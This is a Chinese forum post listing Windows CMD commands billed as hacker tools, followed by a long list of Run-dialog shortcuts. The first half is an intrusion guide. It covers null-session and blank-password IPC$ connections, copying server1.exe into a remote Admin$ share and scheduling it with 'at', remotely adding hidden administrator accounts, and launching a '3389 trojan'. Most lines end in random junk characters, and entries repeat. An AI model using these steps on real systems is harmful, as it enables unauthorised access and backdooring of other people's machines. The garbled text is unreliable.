黑客常用CMD命令集合及WIN开始→运行→输入的命令集锦

net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录)RL7Y
net share c$ /del 禁止C$共享%<NI
net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z：盘O8:b
net use c: /del 删除映射的c盘xj5
net use * /del /y 删除全部}Btp8!
net start 显示本地主机当前服务)LP"
net start telnet 启动 Telnet 服务 i*D'q
net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务)ws
net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)!t 4S;g
net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵);'
net user 得到本地主机的用户列表~
net user guest /active:yes 将停用的guest帐号激活(变为可用)I
net user guest 888888 把 Guest 帐号的密码改为 888888e
net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了)u$c z
net view \\*.*.*.* 查看指定IP主机上的共享R
nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表?"h
net share 查看本地主机的共享资源(本地的默认共享也可以看到)FkF
net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 ZYe
telnet *.*.*.* 90 连接对方机子的telnet,端口为90Q=Aa^
ipconfig 查看本机的IP信息ME
?[PCPING.cn]论坛 -- 黑客技术　　f-I
入侵ipc命令=W,@g
-----------------------------------------------?
net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接(+
copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内5NvnR
net time \\*.*.*.* 查看远程主机的当前时间$IFNJ
at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务b,),RL
?[PCPING.cn]论坛 -- 黑客技术　　;4,nN`
netstat [-r] [-s] [-n] [-a] {F?7c
?[PCPING.cn]论坛 -- 黑客技术　　i^`
参数含义： BoNL
-r 显示本机路由表的内容； a4v9ZK
-s 显示每个协议的使用状态（包括TCP协议、UDP协议、IP协议）； tC
-n 以数字表格形式显示地址和端口； 62j)))
-a 显示所有主机的端口号。)
?[PCPING.cn]论坛 -- 黑客技术　　4
?[PCPING.cn]论坛 -- 黑客技术　　[E$@k
net user 查看用户列表9wnk
net user 用户名 密码 /add 添加用户`SG
net user 用户名 密码 更改用户密码}
net localgroup administrators 用户名 /add 添加用户到管理组m1p,5+
net user 用户名 /delete 删除用户Ve
net user 用户名 查看用户的基本情况\*k>
net user 用户名 /active:no 禁用该用户()arOR
net user 用户名 /active:yes 启用该用户/Z W-\
?[PCPING.cn]论坛 -- 黑客技术　　-
net share 查看计算机IPC$共享资源Wp$1)B
net share 共享名 查看该共享的情况*3i4ko
net share 共享名=路径 设置共享。例如 net share c$=c:Vb,
net share 共享名 /delete 删除IPC$共享DN?wM
?[PCPING.cn]论坛 -- 黑客技术　　3@
net use 查看IPC$连接情况`zb?XD
net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接/UGv-
?[PCPING.cn]论坛 -- 黑客技术　　d
net time \\ip 查看远程计算机上的时间"R
?[PCPING.cn]论坛 -- 黑客技术　　 K4
copy 路径:\文件名 \\ip\共享名 复制文件到已经ipc$连接的计算机上8l@&
?[PCPING.cn]论坛 -- 黑客技术　　e%c_
net view ip 查看计算机上的共享资源k6>pL
?[PCPING.cn]论坛 -- 黑客技术　　8)#:cD
ftp 服务器地址 进入FTP服务器!*m*
?[PCPING.cn]论坛 -- 黑客技术　　|Zw
at 查看自己计算机上的计划作业b
at \\ip 查看远程计算机上的计划作业lfw
at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业#T
at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业uR
at \\ip all /delete 删除远程计算机上的全部计划作业J
?[PCPING.cn]论坛 -- 黑客技术　　vu'
?[PCPING.cn]论坛 -- 黑客技术　　1$0g5
?[PCPING.cn]论坛 -- 黑客技术　　ZN
*:\ftp.exe "net user 用户名$ 密码 /add" 远程添加帐号 *:\FTP.exe 这个是使普通帐号暂时拥有ADMINISTRATOR的权限，需要传上去之后在对方的绝对路径使用$_RZA
*:\ftp.exe "net localgroup administrators 用户名$ /add" 远程把用户提升为超级管理员权限uv=qN
*:\ftp.exe "*:\3389.exe" 远程运行3389木马1[;-=J
at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务AAFUAx
*:\ftp.exe "iisreset /reboot" 重启远程机子4W1a
?[PCPING.cn]论坛 -- 黑客技术　　/2[
net start 显示所有安装的软件hy}I#`
netstat -na 显示开放的所有端口0]H^1^
ipconfig /all 找出SQL不是同一台机器的连接正确IPabD
WIN开始→运行→输入的命令集锦

sndrec32－－－－－－－录音机

Nslookup－－－－－－－IP地址侦测器

explorer－－－－－－－打开资源管理器

logoff－－－－－－－－－注销命令

tsshutdn－－－－－－－60秒倒计时关机命令

lusrmgr.msc－－－－本机用户和组

services.msc－－－本地服务设置

oobe/msoobe /a－－－－检查XP是否激活

notepad－－－－－－－－打开记事本

cleanmgr－－－－－－－**整理

net start messenger－－－－开始信使服务

compmgmt.msc－－－计算机管理

net stop messenger－－－－－停止信使服务

conf－－－－－－－－－－－启动 netmeeting

dvdplay－－－－－－－－DVD播放器

charmap－－－－－－－－启动字符映射表

diskmgmt.msc－－－磁盘管理实用程序

calc－－－－－－－－－－－启动计算器

dfrg.msc－－－－－－－磁盘碎片整理程序

chkdsk.exe－－－－－Chkdsk磁盘检查

devmgmt.msc－－－ 设备管理器

regsvr32 /u *.dll－－－－停止dll文件运行

drwtsn32－－－－－－ 系统医生

rononce －p －－－－15秒关机

dxdiag－－－－－－－－－检查DirectX信息

regedt32－－－－－－－注册表编辑器

Msconfig.exe－－－系统配置实用程序

rsop.msc－－－－－－－组策略结果集

mem.exe－－－－－－－－显示内存使用情况

regedit.exe－－－－注册表

winchat－－－－－－－－XP自带局域网聊天

progman－－－－－－－－程序管理器

winmsd－－－－－－－－－系统信息

perfmon.msc－－－－计算机性能监测程序

winver－－－－－－－－－检查Windows版本

sfc /scannow－－－－－扫描错误并复原
taskmgr－－－－－任务管理器（2000／xp／2003）
wmimgmt.msc－－－－打开windows管理体系结构(WMI)
wupdmgr－－－－－－－－windows更新程序
w脚本－－－－－－－－windows脚本宿主设置
write－－－－－－－－－－写字板
winmsd－－－－－－－－－系统信息
wiaacmgr－－－－－－－扫描仪和照相机向导
winchat－－－－－－－－XP自带局域网聊天
mem.exe－－－－－－－－显示内存使用情况
Msconfig.exe－－－系统配置实用程序
mplayer2－－－－－－－简易widnows media player
mspaint－－－－－－－－画图板
mstsc－－－－－－－－－－远程桌面连接
mplayer2－－－－－－－媒体播放机
magnify－－－－－－－－放大镜实用程序
mmc－－－－－－－－－－－－打开控制台
mobsync－－－－－－－－同步命令
dxdiag－－－－－－－－－检查DirectX信息
drwtsn32－－－－－－ 系统医生
devmgmt.msc－－－ 设备管理器
dfrg.msc－－－－－－－磁盘碎片整理程序
diskmgmt.msc－－－磁盘管理实用程序
dcomcnfg－－－－－－－打开系统组件服务
ddeshare－－－－－－－打开DDE共享设置
dvdplay－－－－－－－－DVD播放器
net stop messenger－－－－－停止信使服务
net start messenger－－－－开始信使服务
notepad－－－－－－－－打开记事本
nslookup－－－－－－－网络管理的工具向导
ntbackup－－－－－－－系统备份和还原
narrator－－－－－－－屏幕“讲述人”
ntmsmgr.msc－－－－移动存储管理器
ntmsoprq.msc－－－移动存储管理员操作请求
netstat －an－－－－(TC)命令检查接口

syncapp－－－－－－－－创建一个公文包
sysedit－－－－－－－－系统配置编辑器
sigverif－－－－－－－文件签名验证程序
sndrec32－－－－－－－录音机
shrpubw－－－－－－－－创建共享文件夹
secpol.msc－－－－－本地安全策略
syskey－－－－－－－－－系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
services.msc－－－本地服务设置
Sndvol32－－－－－－－音量控制程序
sfc.exe－－－－－－－－系统文件检查器
sfc /scannow－－－windows文件保护

tsshutdn－－－－－－－60秒倒计时关机命令
tourstart－－－－－－xp简介（安装完成后出现的漫游xp程序）
taskmgr－－－－－－－－任务管理器

eventvwr－－－－－－－事件查看器
eudcedit－－－－－－－造字程序
explorer－－－－－－－打开资源管理器

packager－－－－－－－对象包装程序
perfmon.msc－－－－计算机性能监测程序
progman－－－－－－－－程序管理器

regedit.exe－－－－注册表
rsop.msc－－－－－－－组策略结果集
regedt32－－－－－－－注册表编辑器
rononce －p －－－－15秒关机
regsvr32 /u *.dll－－－－停止dll文件运行
regsvr32 /u zipfldr.dll－－－－－－取消ZIP支持

cmd.exe－－－－－－－－CMD命令提示符
chkdsk.exe－－－－－Chkdsk磁盘检查
certmgr.msc－－－－证书管理实用程序
calc－－－－－－－－－－－启动计算器
charmap－－－－－－－－启动字符映射表
cliconfg－－－－－－－SQL SERVER 客户端网络实用程序
Clipbrd－－－－－－－－剪贴板查看器
conf－－－－－－－－－－－启动netmeeting
compmgmt.msc－－－计算机管理
cleanmgr－－－－－－－**整理
ciadv.msc－－－－－－索引服务程序

osk－－－－－－－－－－－－打开屏幕键盘
odbcad32－－－－－－－ODBC数据源管理器
oobe/msoobe /a－－－－检查XP是否激活
lusrmgr.msc－－－－本机用户和组
logoff－－－－－－－－－注销命令

iexpress－－－－－－－木马捆绑工具，系统自带

Nslookup－－－－－－－IP地址侦测器

fsmgmt.msc－－－－－共享文件夹管理器

utilman－－－－－－－－辅助工具管理器

gpedit.msc－－－－－组策略